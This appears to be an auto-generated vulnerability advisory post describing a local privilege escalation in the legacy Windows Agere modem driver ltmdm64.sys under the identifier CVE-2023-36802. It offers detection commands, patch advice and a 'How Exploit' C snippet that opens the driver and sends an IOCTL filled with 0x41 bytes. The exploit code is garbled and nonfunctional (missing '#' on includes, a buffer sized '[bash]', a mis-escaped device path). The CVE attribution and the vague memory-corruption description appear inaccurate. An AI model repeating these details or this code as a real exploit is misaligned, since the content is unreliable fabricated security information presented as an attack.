Windows Agere Modem Driver, Privilege Escalation, CVE-2023-36802 (High)

By /

Listen to this Post

The CVE-2023-36802 vulnerability resides in the ltmdm64.sys driver, a legacy Agere Systems modem driver shipped with Windows. This flaw is a local privilege escalation (LPE) vulnerability. A low-privileged attacker with existing local access to the system can exploit a weakness in the driver’s input/output control (IOCTL) request handling mechanism. By sending a specially crafted, malicious IOCTL request to the driver, the attacker can trigger a memory corruption condition, such as a buffer overflow or use-after-free. This corruption allows the attacker to execute arbitrary code in the context of the kernel, the highest privilege level on the operating system. Consequently, the attacker can elevate their privileges from a standard user to SYSTEM or kernel-level authority, enabling them to install programs, view, change, or delete data, and create new accounts with full user rights.
Platform: Windows
Version: Multiple Versions
Vulnerability: Privilege Escalation
Severity: High

date: 10-10-2023

Prediction: 10-10-2023

What Undercode Say:

sc query ltmdm64
powershell "Get-WindowsDriver -Online | Where-Object {$<em>.Driver -like 'ltmdm'}"
Get-CimInstance Win32_PnPSignedDriver | Where-Object {$</em>.DriverName -like 'ltmdm'}

How Exploit:

include <windows.h>
include <stdio.h>
int main() {
HANDLE hDevice = CreateFileA("\\.\ltmdm64", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDevice == INVALID_HANDLE_VALUE) { return 1; }
DWORD bytesReturned;
char inBuffer[bash] = {0};
char outBuffer[bash] = {0};
// Malicious buffer crafting
memset(inBuffer, 0x41, sizeof(inBuffer));
// Triggering the vulnerable IOCTL
DeviceIoControl(hDevice, 0x9F00B, (LPVOID)inBuffer, sizeof(inBuffer), (LPVOID)outBuffer, sizeof(outBuffer), &bytesReturned, NULL);
CloseHandle(hDevice);
return 0;
}

Protection from this CVE:

Apply October 2023 Patch.

Remove ltmdm64.sys driver.

Disable vulnerable driver.

Block driver load.

Use Windows Defender.

Impact:

Full System Compromise.

Kernel Mode Access.

Bypass Security Controls.

Persistence Establishment.

Data Theft.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top